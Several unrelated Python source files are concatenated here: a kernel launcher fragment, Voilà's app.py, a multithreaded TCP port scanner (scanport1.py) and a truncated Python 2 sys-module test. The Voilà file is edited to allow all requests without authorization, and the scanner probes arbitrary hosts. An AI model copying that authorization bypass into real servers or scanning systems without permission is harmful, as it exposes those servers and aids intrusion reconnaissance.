if gateway_socket: # socket in use, start gateway listener thread
gateway_listener_process = Process(target=gateway_listener, args=(gateway_socket, os.getpid(),))
gateway_listener_process.start()
# Initialize the kernel namespace for the given cluster type
if cluster_type == 'spark' and spark_init_mode == 'none':
cluster_type = 'none'
# launch the IPython kernel instance
start_ipython(locals(), cluster_type=cluster_type, connection_file=connection_file, ip=ip)
try:
os.remove(connection_file)
except Exception:
pass
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_server.auth.authorizer import AllowAllAuthorizer # mark@saeon
from jupyterlab_server.themes_handler import ThemesHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
from .utils import create_include_assets_functions
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
'pool_size': 'VoilaConfiguration.default_pool_size'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overridable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
self.contents_manager = LargeFileManager(parent=self)
preheat_kernel: bool = self.voila_configuration.preheat_kernel
pool_size: int = self.voila_configuration.default_pool_size
kernel_manager_class = voila_kernel_manager_factory(
self.voila_configuration.multi_kernel_manager_class,
preheat_kernel,
pool_size
)
self.kernel_manager = kernel_manager_class(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
self.app.settings.update(dict(authorizer=AllowAllAuthorizer())) # mark@saeon
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
(
url_path_join(self.server_url, r'/voila/themes/(.*)'),
ThemesHandler,
{
'themes_url': '/voila/themes',
'path': '',
'labextensions_path': jupyter_path('labextensions'),
'no_cache_paths': ['/']
},
),
(url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
])
if preheat_kernel:
handlers.append(
(
url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
QueryStringSocketHandler
)
)
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
success = False
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port, self.ip)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
include_assets_functions = create_include_assets_functions(self.voila_configuration.template, url)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(
open_url=url, base_url=url,
theme=self.voila_configuration.theme,
**include_assets_functions
))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
scanport1.py
|
import sys
import subprocess
import socket
import threading
import time
class PortScanner:
# default ports to be scanned
# or put any ports you want to scan here!
__port_list = [1,3,6,9,13,17,19,20,21,22,23,24,25,30,32,37,42,49,53,70,79,80,81,82,83,84,88,89,99,106,109,110,113,119,125,135,139,143,146,161,163,179,199,211,222,254,255,259,264,280,301,306,311,340,366,389,406,416,425,427,443,444,458,464,481,497,500,512,513,514,524,541,543,544,548,554,563]
# default thread number limit
__thread_limit = 1000
# default connection timeout time inseconds
__delay = 10
"""
Constructor of a PortScanner object
Keyword arguments:
target_ports -- the list of ports that is going to be scanned (default self.__port_list)
"""
def __init__(self, target_ports = None):
# If target ports not given in the arguments, use default ports
# If target ports is given in the arguments, use given port lists
if target_ports is None:
self.target_ports = self.__port_list
else:
self.target_ports = target_ports
"""
Return the usage information for invalid input host name.
"""
def __usage(self):
print('python Port Scanner v0.1')
print('please make sure the input host name is in the form of "something.com" or "http://something.com!"\n')
"""
This is the function need to be called to perform port scanning
Keyword arguments:
host_name -- the hostname that is going to be scanned
message -- the message that is going to be included in the scanning packets, in order to prevent
ethical problem (default: '')
"""
def scan(self, host_name, message = ''):
if 'http://' in host_name or 'https://' in host_name:
host_name = host_name[host_name.find('://') + 3 : ]
print('*' * 60 + '\n')
print('start scanning website: ' + str(host_name))
try:
server_ip = socket.gethostbyname(str(host_name))
print('server ip is: ' + str(server_ip))
except socket.error as e:
# If the DNS resolution of a website cannot be finished, abort that website.
#print(e)
print('hostname %s unknown!!!' % host_name)
self.__usage()
return {}
# May need to return specificed values to the DB in the future
start_time = time.time()
output = self.__scan_ports(server_ip, self.__delay, message)
stop_time = time.time()
print('host %s scanned in %f seconds' %(host_name, stop_time - start_time))
print('finish scanning!\n')
return output
"""
Set the maximum number of thread for port scanning
Keyword argument:
num -- the maximum number of thread running concurrently (default 1000)
"""
def set_thread_limit(self, num):
num = int(num)
if num <= 0 or num > 50000:
print('Warning: Invalid thread number limit! Please make sure the thread limit is within the range of (1, 50,000)!')
print('The scanning process will use default thread limit!')
return
self.__thread_limit = num
"""
Set the time out delay for port scanning in seconds
Keyword argument:
delay -- the time in seconds that a TCP socket waits until timeout (default 10)
"""
def set_delay(self, delay):
delay = int(delay)
if delay <= 0 or delay > 100:
print('Warning: Invalid delay value! Please make sure the input delay is within the range of (1, 100)')
print('The scanning process will use the default delay time')
return
self.__delay = delay
"""
Print out the list of ports being scanned
"""
def show_target_ports(self):
print ('Current port list is:')
print (self.target_ports)
"""
Print out the delay in seconds that a TCP socket waits until timeout
"""
def show_delay(self):
print ('Current timeout delay is :%d' %(int(self.__delay)))
"""
Open multiple threads to perform port scanning
Keyword arguments:
ip -- the ip address that is being scanned
delay -- the time in seconds that a TCP socket waits until timeout
output -- a dict() that stores result pairs in {port, status} style (status = 'OPEN' or 'CLOSE')
message -- the message that is going to be included in the scanning packets, in order to prevent
ethical problem (default: '')
"""
def __scan_ports_helper(self, ip, delay, output, message):
'''
Multithreading port scanning
'''
port_index = 0
while port_index < len(self.target_ports):
# Ensure that the number of cocurrently running threads does not exceed the thread limit
while threading.activeCount() < self.__thread_limit and port_index < len(self.target_ports):
# Start threads
thread = threading.Thread(target = self.__TCP_connect, args = (ip, self.target_ports[port_index], delay, output, message))
thread.start()
port_index = port_index + 1
"""
Controller of the __scan_ports_helper() function
Keyword arguments:
ip -- the ip address that is being scanned
delay -- the time in seconds that a TCP socket waits until timeout
message -- the message that is going to be included in the scanning packets, in order to prevent
ethical problem (default: '')
"""
def __scan_ports(self, ip, delay, message):
output = {}
thread = threading.Thread(target = self.__scan_ports_helper, args = (ip, delay, output, message))
thread.start()
# Wait until all port scanning threads finished
while (len(output) < len(self.target_ports)):
continue
# Print openning ports from small to large
for port in self.target_ports:
if output[port] == 'OPEN':
print(str(port) + ': ' + output[port] + '\n')
return output
"""
Perform status checking for a given port on a given ip address using TCP handshake
Keyword arguments:
ip -- the ip address that is being scanned
port_number -- the port that is going to be checked
delay -- the time in seconds that a TCP socket waits until timeout
output -- a dict() that stores result pairs in {port, status} style (status = 'OPEN' or 'CLOSE')
message -- the message that is going to be included in the scanning packets, in order to prevent
ethical problem (default: '')
"""
def __TCP_connect(self, ip, port_number, delay, output, message):
# Initilize the TCP socket object
TCP_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCP_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
TCP_sock.settimeout(delay)
# Initilize a UDP socket to send scanning alert message if there exists an non-empty message
if message != '':
UDP_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
UDP_sock.sendto(str(message), (ip, int(port_number)))
try:
result = TCP_sock.connect_ex((ip, int(port_number)))
if message != '':
TCP_sock.sendall(str(message))
# If the TCP handshake is successful, the port is OPEN. Otherwise it is CLOSE
if result == 0:
output[port_number] = 'OPEN'
else:
output[port_number] = 'CLOSE'
TCP_sock.close()
except socket.error as e:
output[port_number] = 'CLOSE'
pass
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
